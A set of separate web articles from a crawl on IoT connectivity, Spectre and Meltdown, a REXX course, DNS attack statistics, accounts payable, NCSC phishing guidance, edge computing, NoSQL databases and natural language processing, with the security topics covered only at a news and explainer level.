Technological advances are creating a new wave of connected products that previously operated in isolation. This enables companies to control large numbers of products remotely, improving operational efficiency in the field. It allows them to constantly gather streaming information from sensors, creating opportunities for new services and reducing the cost of existing ones. The Key Role of IoT Connectivity Connectivity enables the best possible communication by creating a bridge between the physical and the digital world. It links physical devices, such as sensors and controllers, and the applications in the cloud that interact with them. A connectivity solution enables applications to interact with devices to monitor, control and manage them, as well as subscriptions. An IoT-based service depends on the reliability and quality of the connectivity link. This makes connectivity an important building block in IoT infrastructure. Not only must it be reliable and offer the appropriate quality of service to serve the underlying devices and applications, but it must also be secure enough to stop sensitive data from falling into the wrong hands. The Benefits of Cellular Connectivity There are several different technologies that can be used for IoT connectivity, but many suffer from significant drawbacks. It’s important to understand your short and long-term needs and the strengths and weaknesses of the alternative connectivity technologies Wired networking is a non-starter for many IoT connections, for example. Economic considerations preclude hardwired connections to local area installations at short distances. These links make it time consuming, disruptive and expensive to move or add equipment. At first glance, local area wireless connections would seem to solve this problem. However, they can also suffer from management problems. Traditional Wi-Fi communications channels are subject to interference thanks to heavily overused 2.4 GHz bands. While 5 GHz is better, many Wi-Fi frequencies also use this spectrum today, and it is limited by shorter-distance coverage. These constraints make it more difficult to place and move IoT devices reliably. It’s also a difficult technology to scale in large volumes, and its limited range makes it difficult to support collections of devices scattered across remote locations. Wi-Fi frequencies also have security risks; to learn more, read our white paper “Risky Business: Avoid the Dangers of Wi-Fi with Cellular-Equipped Laptops.” 6 Considerations for IoT Connectivity For companies looking to implement an IoT solution, there are six crucial considerations: In many IoT deployments, infrastructure will have to span many different geographies, each with different carrier coverage. Managing multiple SIM vendors across a global deployment is challenging. Infrastructure will also have different coverage requirements based on the use case. An urban deployment may require support for dense clusters of devices to serve a tightly packed population, for example, whereas a rural implementation may serve a sparse population spread across a wide area. Design teams also need to consider the extent to which the IoT network must provide indoor coverage. Extending communication inside buildings introduces a range of technical issues, such as frequency considerations and density of device placement. Or your deployment may only require regional coverage, for example just in the US or Europe. - Data quality Many IoT deployments support mission critical business processes or are in sectors that are part of the critical national infrastructure. Their connectivity solutions must preserve data integrity and reliability, delivering data streams consistently so that networked IoT devices can support accurate, timely results for applications running mission critical processes. However, companies can face frequent connectivity issues, with local gaps in coverage or prolonged outages, especially if they have a single network provider. A collection of connected IoT devices will also provide the basis for managing potentially millions of devices spread across a wide area. An IoT connectivity solution must therefore be able to scale. Monitoring the state of IoT devices across the network and controlling their operation relies on a robust connectivity layer. REGISTER NOW TO READ THIS WHITEBOOK
<urn:uuid:5abb4027-3103-43d5-ab67-3857f033891c>
CC-MAIN-2022-40
https://www.iot-now.com/2021/07/26/112744-how-to-get-iot-connectivity-right/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00477.warc.gz
en
0.941405
780
2.859375
3
Barely 48 hours into 2018 and what could be one of the biggest cyber security stories of the last ten years is already looking like it could put many of the high profile security hacks and threats of 2017 in the shade. In this article for Cyber Security Jobs, I want to take a look at the two security vulnerabilities that have come to be known as Spectre and Meltdown, what they are, what’s affected and what’s being done to mitigate the problem. In early 2017 a new class of critical security vulnerabilities in modern processors and was discovered by Google Project Zero (as well as several other individuals from different research institutions). Spectre and Meltdown both work by exploiting the way systems in processors work together and manipulating the interactions between certain processes to indirectly reveal information. Reading information through inference like this is known as a ‘side-channel’ attack, in that data is extracted independently and outside of the processors normal information handling paths. These vulnerabilities are inherent to the architecture of modern processors and the techniques they use, which have evolved over the years in order to improve performance. Such techniques include pipelining, branch prediction and speculative execution. Spectre works specifically by exploiting branch prediction, effectively tricking applications to give up secure information. Meltdown doesn’t work by finding victim code but instead sets up a speculative execution in a user process that is able to access protected memory. For a much more technically in depth explanation of how Spectre and Meltdown work, this article from Rupert Goodwins at ZDNet explains all. Let’s not beat around the bush; Spectre and Meltdown represent a major security vulnerability that may well have existed for decades. Pretty much every laptop, PC, tablet and smartphone processor is affected by Spectre with Meltdown affecting all Intel chips made since 1995 with the exception of Itanium and Atom chips made prior to 2013. Cloud services, such as Amazon’s Web Services and Google’s Cloud Platform are also vulnerable. The security flaws are a backdoor into critical system memory, which could store anything from passwords and encryption keys, opening you up to major security breaches. The process of extracting this information using Spectre or Meltdown is slow (bytes per second) but very sensitive information is stored at this level and very little of it is potentially needed (a password for example) in order to compromise a machine or network. What is perhaps so worrying about these security vulnerabilities that exist at the heart of so many of our computer’s functioning is that they’ve been there for decades. Due to their nature it’s also very hard to detect whether someone has been the victim of a Spectre or Meltdown attack. In fact the UK’s National Cyber Security Centre has said there is no evidence that either has ever been used to actually steal data. Of course, it’s highly likely that this will now change as the information behind these security vulnerabilities is now available to would-be hackers, who will quickly look to create tools to exploit both Spectre and Meltdown vulnerabilities. The advice for all users, regardless of device manufacturer, is to update all security settings and install any new fixes. As recently as Monday 8th Jan, Intel CEO Brian Krzanich has said that the issues relating to Intel powered devices were well on their way to being fixed, with 90% of chips released in the last five years being fixed by Saturday (Jan 13th) and fixes for older chips expected in the coming weeks. Microsoft and Linux were amongst the first OS manufacturers to release updates with Chromebooks updated to OS63 already protected. Many Android phones are expected to get updates soon as third party manufacturers scrabble to push them out to their users. There has been a lot of talk about speed issues resulting from the new patches. Whilst security fixes relating to Spectre are unlikely to have much of an effect on performance, it could be another story when it comes to Meltdown. This is because the security fix will require the separation of the kernel and application memory systems in order to prevent the bug taking advantage of the vulnerabilities that arise from this. Estimates range as high as 30% reduction in speed on certain tasks with applications that require lots of writing files the most seriously affected and things like gaming and web browsing least affected. A recent development was Microsoft’s decision on 9th January to halt Spectre and Meltdown updates to all machines running AMD Processors. This has been due to repeated complaints from users after not being able to boot up their computers. The software giant is now preventing all AMD machines being updated with the latest security update until it can resolve the issue in conjunction with AMD. Microsoft is blaming AMDs documentation for the problems. Perhaps one of the most thought provoking things to come out of the chaos and confusion surrounding Spectre and Meltdown, from a cybersecurity industry point of view, has been how four independent groups of security researchers managed to find flaws that had been dormant in these processors for over 20 years within months of each other. When Daniel Gruss of Graz University of Technology in Austria and his two colleagues discovered Meltdown and reported it to Intel they were surprised to hear that Intel was already working on a fix and they were in fact the fourth group to report this class of vulnerability, along with what would come to be known as Spectre. This does also raise the possibility of how many people may have found this vulnerability already and, if so, why it wasn’t made public. It’s no conspiracy theory to posit that security agencies like GCHQ and the NSA, after discovering security vulnerabilities will likely keep them secret in order to exploit them for the purposes of espionage. Of course, this raises the possibility of other actors discovering them independently in what’s known in the industry as ‘bug collision’. The question that arises from the potential bug collision of Spectre and Meltdown is this – if the discovery of bugs and security flaws by simultaneous groups happens is fairly commonplace (whether coincidence or not) then is it not beholden on security agencies like the NSA or GCHQ to report the flaws sooner rather than later, in order to get them fixed and reduce the risk that other security agencies or malevolent actors will discover and exploit them? This is a complex question that has national security, political and ethical ramifications but you can find more detail in this excellent Wired article about it.
<urn:uuid:ccf26006-639a-42e0-b156-538fce4830df>
CC-MAIN-2022-40
https://www.cybersecurityjobs.com/spectre-and-meltdown-what-we-know-so-far/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00477.warc.gz
en
0.966637
1,296
2.78125
3
REXX Keyword Instructions The REXX Keyword Instructions course discusses the common keyword instructions used in REXX coding and describes how looping and execution control instructions are invoked. Personnel requiring an introduction to REXX and an understanding of the fundamentals of programming in REXX. Basic understanding of data processing concepts, some basic programming skills and completion of the Introduction to REXX course or equivalent knowledge. After completing this course the student should be able to: - Identify and use Conversational and - Variable Management Keyword Instructions. - Identify and use Conditional Flow Keyword Instructions - Identify and use looping structures - Identify and use Execution control, Branching and Debugging Keyword Instructions REXX Conversational and Variable Management Instructions Using Conversational Keyword Instructions Using the External Data Queue Variable Templates and Parsing Logic Flow - Conditional Processing Using the IF/THEN/ELSE Keyword Construct Using the SELECT/WHEN/OTHERWISE/END Keyword Construct Logic Flow - Looping Using Repetitive Loops Using Controlled Repetitive Loops Using Conditional and Compound Loops Controlling Nested Loops Execution Control Instructions Using Execution Control Instructions Branching, Procedures and Subroutines REXX Keyword Instructions Mastery Test This course is part of the IBM Digital Badge Program REXX Programming - Experienced Contact our Learning Consultants or call us at 770-872-4278
<urn:uuid:c51e334c-be37-4652-b4ac-4383f88d9a77>
CC-MAIN-2022-40
https://bmc.interskill.com/course-catalog/REXX-Keyword-Instructions.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00477.warc.gz
en
0.650208
342
2.921875
3
Ever since the pandemic hit, the global threat landscape grew more vulnerable, with a wider impact on the cybersecurity community. And this is just the beginning. According to the 2021 Global DNS Threat Report from network security automation solutions provider EfficientIF, nearly 90% of organizations have suffered a Domain Name System (DNS) attack last year. Cybercriminals are leveraging multiple hacking techniques to pilfer sensitive digital assets, and one of them is DNS attacks. What is a DNS Attack? DNS is a protocol that translates a domain name into an IP address. In a DNS attack, adversaries exploit vulnerabilities in the domain name system to obtain access to targeted devices. They also pharm and phish users to generate revenue and steal critical data. DNS is leveraged to launch attacks in multiple ways, including DNS reflection attacks, DoS, DDoS, and DNS poisoning. “This past year of the pandemic has shown us that DNS must play a role in an effective security system. As workers look to more permanently transition to off-premises sites, making use of cloud, IoT, edge, and 5G, companies and telecom providers should look to DNS for a proactive security strategy. This will ensure the prevention of network or application downtime as well as protecting organizations from confidential data theft and financial losses,” said Ronan David, VP of Strategy for EfficientIP. - Malaysia experienced the highest increase of 78% in the cost per attack, with an average cost per attack of $787, 200. The two countries among the top three are India and Spain. - In Asia, while India experienced an increase of 32%, Singapore’s damages declined by 12%, against the regional average increase of 15%. - Asia experienced a sharp rise in damages of $908,140, compared to last year’s $792,840. The countries that saw average damages above $1,000, 000 were India, France, and Germany. - 26% of organizations reported sensitive customer information being stolen, compared to 16% in 2020. - Phishing also continued to grow, with 49% of companies experiencing phishing attempts. In the Asia Pacific, the phishing rate was as high as 46%, with nearly half experiencing a phishing attack included India, Singapore, and Malaysia the most-experienced type of attack including malware-based attack, domain hijacking, cloud misconfiguration abuse, tunneling, and zero-day vulnerability. The Impact of DNS Attacks The report revealed that downtime of in-house and cloud applications remains the major impact of DNS attacks, indicating how critical DNS is to ensure resilience and to secure access between users and applications. “The impact and cost of attacks remain extremely high and continue to increase year over year. This not only affects company finances but also brand image and data confidentiality. With the pandemic, ransomware has increased to become an industry in its own right and a major concern for most organizations. Using DNS filtering and blocking is critical as it can help to stop ransomware attacks right after the infection when the malware tries to contact command and control,” the report stated.
<urn:uuid:8b4a092e-64a7-4f6a-9cc9-cc1f7466e201>
CC-MAIN-2022-40
https://cisomag.com/dns-attacks-surge-by-15-in-apac-india-among-worst-hit-nations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00477.warc.gz
en
0.944784
641
2.71875
3
Accounts Payable is a crucial business function that corporate decision makers can leverage to control working capital, manage supplier relationships and reduce costs. Here’s a breakdown of the Accounts Payable process, important metrics and methods for achieving execution excellence through continuous process improvement. Accounts Payable (AP or A/P), sometimes called “payables,” is a key part of how businesses control their cash flow. In general accounting terms, AP is a current, short-term liability/debt for goods or services received on credit from a vendor. Within a company's financial statements, Accounts Payable appears as a debit on the balance sheet. An organization’s Accounts Payable team, often located within the Finance department, is responsible for processing and paying supplier invoices. They also play a key role in maintaining vendor relationships as they are often the point of contact for invoicing and payment-related issues, such as payment status. An AP expense can be anything from office supplies to restaurant ingredients and includes, but is not limited to: Energy and fuel Transportation and logistics Accounts Payable has historically been thought of as a cost center, but in reality it’s a strategic tool for managing working capital. In periods of high inflation, supply chain disruptions and global macroeconomic instability, AP procedures can be adjusted to preserve cash by paying invoices later (extending payment terms) or improve profitability by paying invoices early to receive cash discounts. Businesses can maximize their AP execution capacity by dynamically adjusting invoice processing. Accounts Payable sits within the Procure-to-Pay (P2P), sometimes called Purchase-to-Pay, business process after Procurement, also called Purchasing. More broadly, P2P is the second stage of the Source-to-Pay (S2P) process after Sourcing. The AP process itself contains the following steps in order: Purchase and receive goods Record invoice receipt Due date passed “Purchase and Receive Goods” is often handled by the Procurement team, with the AP team completing the remaining steps.Download Celonis EMS Accounts Payable Execution App Data Sheet Accounts Receivable (AR or A/R), sometimes called “receivables,” is the current money owed to your company for products and services that have been rendered but not paid for (on credit). Accounts receivable is considered a current asset on a corporate balance sheet, whereas accounts payable is considered a current liability. Like AP, the AR team is often located within the Finance Department. AP teams have the ability to accelerate cash preservation, boost productivity and cut costs through the following business objectives: Working Capital Optimization Accounts Payable exists to ensure the suppliers are paid on-time for the goods and service required by the business as efficiently as possible. Using tools like AP automation, teams can influence Labor Productivity by improving cycle time and reducing costs. They can help the business better manage working capital by increasing DPO, pay on-time and creating a negative cash conversion cycle (i.e. inventory is sold before the business has to pay for it). They can drive Cost Avoidance by capturing cash discounts, preventing duplicate payments and avoiding penalties. And, AP teams can ensure compliance by verifying on-time payment with the correct amount. There are multiple metrics, or key performance indicators (KPIs), businesses track to determine whether Accounts Payable is meeting core business objectives. Here are six common AP metrics that fall under each of the four business objectives listed above and include: Cost per Invoice - Labor Productivity No-Touch Rate - Labor Productivity Days Payable Outstanding (DPO) - Working Capital Optimization Excess Spend - Cost Avoidance Late Payment - Cost Avoidance Pre-Approved Spend - Compliance The Accounts Payable department can improve their KPI performance and ensure process excellence by using automation, Process Mining and Execution Management to reduce vendor invoice errors, eliminate duplicate payments, capture cash discounts, avoid penalty and late payments, stop maverick buying and maintain approval compliance. Days Payable Outstanding is the average number of days a company takes to pay its bills. A higher DPO means a company takes longer to pay its debts. A lower DPO means a company pays its bills more quickly. AP departments can use DPO to manage free cash flow and working capital. By extending DPO, companies can hold on to cash longer or use it for short-term investments. However, a high DPO could also be an indication that an organization is having difficulty paying its bills. Also by reducing DPO, companies may be able to take advantage of supplier cash discounts. What is an average DPO? It depends on the industry, but according to the J.P. Morgan Working Capital Index Report 2022, the average DPO for 2021 was 47.4 days. From 2011 to 2021, the average DPO fluctuated between 45.8 in 2012 and 51.1 in 2020 during the Covid-19 pandemic. Prevent duplicate invoice payments. Companies lose significant amounts of cash from paying duplicate invoices. Unfortunately, many ERP systems only detect duplicates that are 100% matches, and don't detect small differences such as typos, scanning errors or inaccurate master data. Duplicate invoices can also happen when the same invoice is submitted in paper and electronically. With process mining, execution management and machine learning, AP departments can better detect duplicate payments, reclaim the associated payments and proactively prevent future duplicate payments. Minimize Payment Term Mismatches. Too often, AP teams can’t tell whether an invoice’s payment terms match those within the vendor’s contract, which could be more favorable to your business. Companies operating at peak execution capacity are able to scan each incoming invoice and detect discrepancies in the payment terms between the invoice, purchase order (PO), vendor master data and historical invoices from that vendor. Maximize Cash Discount Utilization. Payment blocks and lengthy invoice processing times often mean companies don’t capture all of the cash discounts available to them, which hurts operating margins. The Accounts Payable office can leverage automation and process mining to determine which vendors would be the best candidates for cash discounting, pinpoint when and where leakages are happening and prioritize the removal of vendor payment blocks to capture discounts. Minimize Payment Blocks. Payment blocks happen when there is a price or quantity mismatch between the PO and invoice, or missing goods causes a three-way match error. If blocks prevent AP from making a timely payment and result in excessive late payments, suppliers may prioritize other customers or cancel orders. AP departments can use an execution management system to identify the root causes of mismatches and missing goods receipts, allow purchases to update PO prices and confirm goods receipts and even automate block removal. Prevent Currency Mismatches. As companies grow their international business, they may also experience a rise in foreign currency transactions. To reduce incorrect payments, AP teams must identify the correct currency for a transaction. Process mining and execution management solutions can be used to detect and flag incoming invoices with unusual currencies (based on historical invoices, the PO and master data) so analysts can take action. Regardless of the industry, company size or AP software used, Accounts Payable departments face many of the same challenges. Here are six common problems that prevent companies from running an efficient AP operation: Payment term discrepancies between invoices and POs Invoices filled in wrong Lengthy approval times Process Mining and Execution Management give AP departments the means to overcome these challenges without the cost and disruption of replacing existing hardware and software. Accounts Payable automation helps improve AP productivity by streamlining procedures, reducing manual work, reducing rework caused by human errors, and increasing process consistency. AP automation comes in many forms from simple spreadsheet macros to full-blown robotic process automation (RPA), and it can be used to automate everything from invoice routing and approval to managing purchasing card transactions. Indeed, it would be unrealistic for today’s large enterprises to manage the volume of transactions that flow through their AP departments without some form of automation. The question for AP executives is therefore not not whether to implement automation or not, but which AP processes should they automate and how do they realize the maximum benefit from their automation efforts? Process Mining and Execution Management can address both concerns. Process Mining pulls data from your existing business systems, creates an X-ray of your AP process and identifies any execution gaps. Understanding where your biggest inefficiencies are gives you a starting point for your AP automation strategy. Execution Management combines Automation, Process Mining and technologies such as artificial intelligence and machine learning into a single platform, an Execution Management System (EMS). An EMS ingests data from multiple business systems, analyzes that data and then automatically executes targeted actions through those existing systems. By delivering insights and enabling action, an EMS allows AP organizations to operate at maximum capacity.
<urn:uuid:8b47d53d-c06c-42bd-9a38-4fe23e24577b>
CC-MAIN-2022-40
https://www.celonis.com/blog/what-is-accounts-payable-definition-process-business-objectives-metrics-and-kpis/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00477.warc.gz
en
0.93978
1,915
2.578125
3
The National Cyber Security Centre (NCSC) is a part of GCHQ, working to increase cyber security standards across the UK. Regularly offering advice on its website, the NCSC has recently released its guidance on how to defend your organisation against phishing attacks. Cyber security has cost the UK an estimated £26 billion, with phishing being the most common type of attack affecting more than 1 million businesses last year. It is a type of social engineering, where cyber attackers rely on users making mistakes such as clicking a bad link or disclosing information. Whilst phishing can be conducted via many channels, such as text messages and phone calls, most people consider phishing attacks to be orchestrated via email. Phishing is a popular choice among cyber-criminals for many reasons: - It is an easy method for targeting a lot of people, with many recipients unknowingly forwarding the phishing email to colleagues and friends - There are many phishing tools available online for little cost, enabling novice hackers to perform phishing attacks - It can be used alongside ransomware and malware, relying on human errors rather than system vulnerabilities Typical defences include cyber security training and awareness for employees. However, in its latest guidance, the NCSC have highlighted that whilst awareness is important, there are limitations and drawbacks when training is relied upon as the sole defence mechanism. Instead, the guidance suggests that organisations implement a multi-layered approach to cyber security. The four layers include: - Making it difficult for attackers to reach users - Help users to identify and report suspected phishing emails - Protect the organisation from the effects of undetected phishing emails - Respond quickly to incidents To view the full guidance document, click here. This follows further guidance for SME’s that was released by the NCSC in October 2017. This advice includes backing up data, using strong passwords, protecting against malware, keeping devices safe and avoiding phishing attacks. For more information about this wider 5 steps program, click here. Eventura work with customers to implement comprehensive cyber security plans, which adopt a multi-layer approach and are tailored to individual business needs. If you are concerned about cyber security and would like to have a friendly chat with our professional team, simply contact us by clicking here.
<urn:uuid:dc595416-faf5-4192-970b-4c49527715a5>
CC-MAIN-2022-40
https://eventura.com/cyber-security/the-ncsc-have-released-their-phishing-guidance-defend-your-organisation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00477.warc.gz
en
0.95453
464
2.578125
3
By the year 2025, over 200 million edge nodes will be deployed worldwide. But what will all this additional spending on edge computing amount to? For distributed enterprises, those with many locations or those with a far reach, edge computing can reduce latency, lower the load on central data centers, and increase security. So how do you implement edge computing, and why should you? What is edge computing? Edge computing is actually a fairly literal name. Companies have centralized data centers where they store large amounts of information, but to get that information to customers and employees far away from the central data center, they need to push some of that computing power to the edge of the network – and expand the concept of enterprise networking to include the needs of all those remote devices. With these edge nodes, customers and employees can get information faster than they could if they needed to access the central data center. The OpenStack diagram below shows how a network that features edge computing might be set up. Edge computing benefits Reduced workloads on servers In traditional data center models, whether on premises or cloud-based, when remote applications need data, they send a signal all the way to the main data center and then have to wait for it to come back. While information travels quickly over the internet, even minor delays can add up over the course of a day or week, and the more relays there are, the higher the chance that a request hits a delay. In critical use cases, say autonomous cars or energy sensors, latency and reliability issues can have serious consequences. Edge computing, on the other hand, utilizes local resources to process data, reduce latency and allow applications to perform actions based on predetermined triggers. If a company needs to update a trigger, then it can send updates via the data center. For example, a manufacturer may use IoT devices in their production environment to automate certain parts of the assembly line. Rather than having the IoT device send a signal to the central data center every time a new product triggers it and the data center sends instructions back, the manufacturer can keep data processing nearby via an edge caching server or load instructions onto the IoT device itself and have it respond to the trigger on its own. In the case of a self-driving car or critical infrastructure monitoring, real-time data processing becomes essential, requiring data processing on the device itself and rapid communication via local infrastructure, making 5G a critical driver of edge computing and the Internet of Things. With edge devices able to process data and communicate, the networking model becomes something akin to the peer-to-peer networks of the early 2000s, communicating with data centers when necessary. Also read: Where AI Can Improve the Supply Chain Edge computing can also help companies become more flexible. Businesses can set up local edge data centers to extend their reach into new markets rather than building entirely new offices. Additionally, because IoT devices are always on with edge computing, they can provide businesses with an unprecedented amount of information. All this data leads to greater insights for the business, allowing them to easily pivot or make adjustments if something isn’t working as it should. Edge computing is also key to enabling remote work, especially as 5G infrastructure becomes more mainstream. Currently, edge nodes aren’t widely used enough to reach all residential areas, but once 5G is widely available, businesses could combine it with their edge networks and extend them to their customers and remote employees. Because edge computing is less centralized, companies that use it are less vulnerable to distributed denial of service (DDoS) attacks. With so many edge data centers and servers working simultaneously, it’s difficult for attackers to manipulate enough traffic to shut them all down. While there are more points to secure versus having a single data center, the distributed nature of the edge removes any single point of failure. Edge computing also makes it easier to quarantine affected devices and remediate threats without shutting down the whole network. Along with spreading out the attack surface so it’s more difficult to make a widespread attack, edge computing also transfers smaller amounts of data at once. While transferring data would normally be vulnerable to attack, the smaller amounts make it a less appealing target to malicious actors. Plus, devices only communicate with the data center when necessary, like for updates or data refreshes. This way, even if a device is breached, the amount of data that is compromised will be much smaller. Reduced workloads on servers The average home in the United States contained 10 internet connected devices in 2020, and that doesn’t even include business devices. Each of a company’s devices generates an insane amount of data which could easily overload servers if left unchecked – a risk that will increase with the huge data demands of artificial intelligence (AI) and remote devices. However, edge computing spreads out the processing of this data into multiple locations to reduce the workload on central servers. Most businesses worry about DDoS attacks, but even legitimate traffic could be a danger to centralized servers in the right circumstances. For example, a 24-hour gym franchise might use IoT scanners to control access into the facility. If all of those devices were sending and receiving signals from the central system, that would be a pretty inefficient way to run a network and would also create a single point of failure that could shut everything down. Instead, the sensor just reacts to the trigger and allows the approved individual inside, updated by the central data center only as information changes. The importance of AI in edge computing AI is going to become a critical part of edge computing as it becomes more mainstream. Self-driving cars are a great example for this. When self-driving cars become a reality, they’ll need the ability to take in and process information in real-time. To do this, the cars will include AI to perceive the world around them, make inferences based on the data they take in (in this case, traffic signals and other cars on the road), and then act based on that information. Edge computing is key to this because real-time processing wouldn’t be possible if the cars had to send all of the information they take in off to the central data center and then wait for it to come back. Instead, the car itself would become an edge node, able to process all of the data within its own CPUs. Peter Levine of venture capital firm Andreessen Horowitz likens this model to the peer-to-peer (P2P) networking of the early 2000s, where devices communicate with each other and contact data centers only as needed. Implementing edge computing Edge computing isn’t necessary for every company, but those with remote data processing needs could gain a lot from it. If an organization decides to move forward with edge computing, it can either build the infrastructure itself or contract with a third-party vendor to provide the necessary hardware and software. In some cases, say with critical infrastructure, businesses may want tighter control over their edge computing capabilities. If so, they may decide on a do-it-yourself (DIY) model. The business would need to purchase edge computing hardware from vendors like Dell or HP according to their network needs and then add the right management software. Then, the company’s IT department would need to set everything up and ensure the devices and software are connected and compatible. While this offers more customization and flexibility, it’s a lot of work that smaller businesses may not want to undertake. If the cost is too high for companies to set up their edge computing network on their own, they may opt instead to contract with third-party providers. For this option, the vendor would install their own equipment and software, and the company would pay a flat monthly rate. The vendor would handle all of the updates and maintenance, reducing the organization’s need for dedicated IT staff. This option requires fewer resources from the purchasing company, but it doesn’t have the same level of control or customization. Intelligence in devices themselves will also be critical to edge computing, so businesses will want to evaluate their options carefully. Is edge computing the right move for your business? Edge computing is a great option for businesses with many locations or that need to reduce latency for customers far away from their headquarters. Streaming services, large franchises, and companies that manage their own supply chain could benefit from edge computing. You should take stock of your current computing requirements and note any latency that you’re seeing. If you’re seeing time loss or your servers are getting close to overloading regularly, it may be time to consider edge computing.
<urn:uuid:a3fb3e80-8efc-43fa-96cd-9d9c0e90b446>
CC-MAIN-2022-40
https://www.baselinemag.com/infrastructure/edge-computing-for-distributed-enterprises/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00477.warc.gz
en
0.935018
1,771
3.03125
3
From the relational databases, that characterized the last two decades and more. NoSQL databases have gained popularity as a better method of data handling, and below are five reasons why: 1. Elastic Scalability In the past, the best DBA services still had to depend on scaling up whenever there was a need for expansion. This meant purchasing larger servers to deal with the increasing data load. NoSQL databases offer the much easier option of scaling out – the databases are distributed across multiple pre-existing hosts. With an increase in the availability requirements and transaction rates, scaling out onto virtual environments offers a more economical alternative to hardware scaling. It is not as easy to scale out RDBMS on commodity clusters, but with NoSQL databases, transparent expansion is already pre-programmed so that they can scale out to fill new nodes. These are also designed bearing in mind low-cost commodity hardware. 2. Useful for big data The last decade has witnessed a rapid growth in the transaction rates, as have the volumes of data that need to be stored. This is what led to the creation of the term ‘big data’, and has been affectionately referred to as the “industrial revolution of data” in certain circles. The capacity of RDBMSs grew to match the requirements of the new data volumes, but just as happened with the transaction rates, there’s only so much data volume that can be managed by a single RDBMS practically. Instead, many people are turning to NoSQL systems like Hadoop to handle their ‘big data’ volumes, as these outperform the capabilities of the most prominent RDBMS. 3. Reduced reliance on in-house DBAs A major disadvantage of implementing these powerful high-end RDBMSs is that maintenance is only possible by employing trained DBAs, which certainly don’t come cheap. They are intricately involved in the design, installation and performance tuning of these RDBMSs, which makes them virtually indispensable. On the other hand, NoSQL databases have been designed to require less hands-on administration, with features like data distribution, auto-repair, and simplified data models. While somebody still has to be accountable for the management of the systems, organizations implementing the latter can only rely on the best remote DBA services which are cheaper and work just as well, rather than incurring the cost of retention and progressive training on an in-house DBA. 4. It’s cheaper NoSQL databases are designed to utilize cheap commodity server clusters for the management of ever-growing transaction and data volumes. RDBMSs, on the other hand, require expensive storage systems and patented servers, which means that the latter has a greater cost per volumes of data stored. This means that for a much lower price, you can store and process a higher volume of data. 5. Agile data models RDBMSs give colossal headaches when it comes to change management, especially for the large production ones. The minor change must be carefully monitored, and may still involve some downtime or reduction in service levels. NoSQL does not have such restrictions on their data models, and even the more rigid NoSQL databases based on BigTable structure still allow for relative flexibility like an addition of new columns with no major breakdowns. This means that changes to applications or database schema need not be managed as a single change unit, making the process much easier.
<urn:uuid:41b5cc01-08cb-45e1-a791-dfa92e92cae6>
CC-MAIN-2022-40
https://www.crayondata.com/advantages-of-nosql-databases-what-you-need-to-know/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00477.warc.gz
en
0.947251
706
2.65625
3
Today, with Digitization of everything, 80 percent of the data being created is unstructured. Audio, Video, our social footprints, the data generated from conversations between customer service reps, tons of legal document’s texts processed in financial sectors are examples of unstructured data stored in Big Data. Organizations are turning to natural language processing (NLP) technology to derive understanding from the myriad of these unstructured data available online and in call-logs. Natural language processing (NLP) is the ability of computers to understand human speech as it is spoken. NLP is a branch of artificial intelligence that has many important implications on the ways that computers and humans interact. Machine Learning has helped computers parse the ambiguity of human language. Apache OpenNLP, Natural Language Toolkit(NLTK), Stanford NLP are various open source NLP libraries used in the real-world application below. Here are multiple ways NLP is used today: The most basic and well-known application of NLP is Microsoft Word spell checking. Text analysis, also known as sentiment analytics is a key use of NLP. Businesses are most concerned with comprehending how their customers feel emotionally and use that data for the betterment of their service. Email filters are another important application of NLP. By analyzing the emails that flow through the servers, email providers can calculate the likelihood that an email is a spam based its content by using Bayesian or Naive based spam filtering. Call centers representatives engage with customers to hear a list of specific complaints and problems. Mining this data for sentiment can lead to incredibly actionable intelligence that can be applied to product placement, messaging, design, or a range of other use cases. Google and Bing and other search systems use NLP to extract terms from text to populate their indexes and to parse search queries. Google Translate applies machine translation technologies in not only translating words but in understanding the meaning of sentences to provide a true translation. Many important decisions in financial markets use NLP by taking plain text announcements and extracting the relevant info in a format that can be factored into algorithmic trading decisions. E.g. news of a merger between companies can have a big impact on trading decisions, and the speed at which the particulars of the merger, players, prices, who acquires who can be incorporated into a trading algorithm can have profit implications in the millions of dollars. Since the invention of the typewriter, the keyboard has been the king of the human-computer interface. But today with voice recognition via virtual assistants, like Amazon’s Alexa, Google’s Now, Apple’s Siri and Microsoft’s Cortana respond to vocal prompts and do everything from finding a coffee shop to getting directions to our office and also tasks like turning on the lights in home, switching the heat on etc. depending on how digitized and wired-up our life is. Question Answering – IBM Watson is the most prominent example of question answering via information retrieval that helps guide in various areas like healthcare, weather, insurance etc. Therefore it is clear that Natural Language Processing takes a very important role in new machine-human interfaces. It’s an essential tool for leading-edge analytics & is the near future.
<urn:uuid:8e21c130-7a5e-45dd-acce-06577ab21a5c>
CC-MAIN-2022-40
https://www.crayondata.com/see-simple-introduction-natural-language-processing-nlp/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00477.warc.gz
en
0.926684
673
2.921875
3
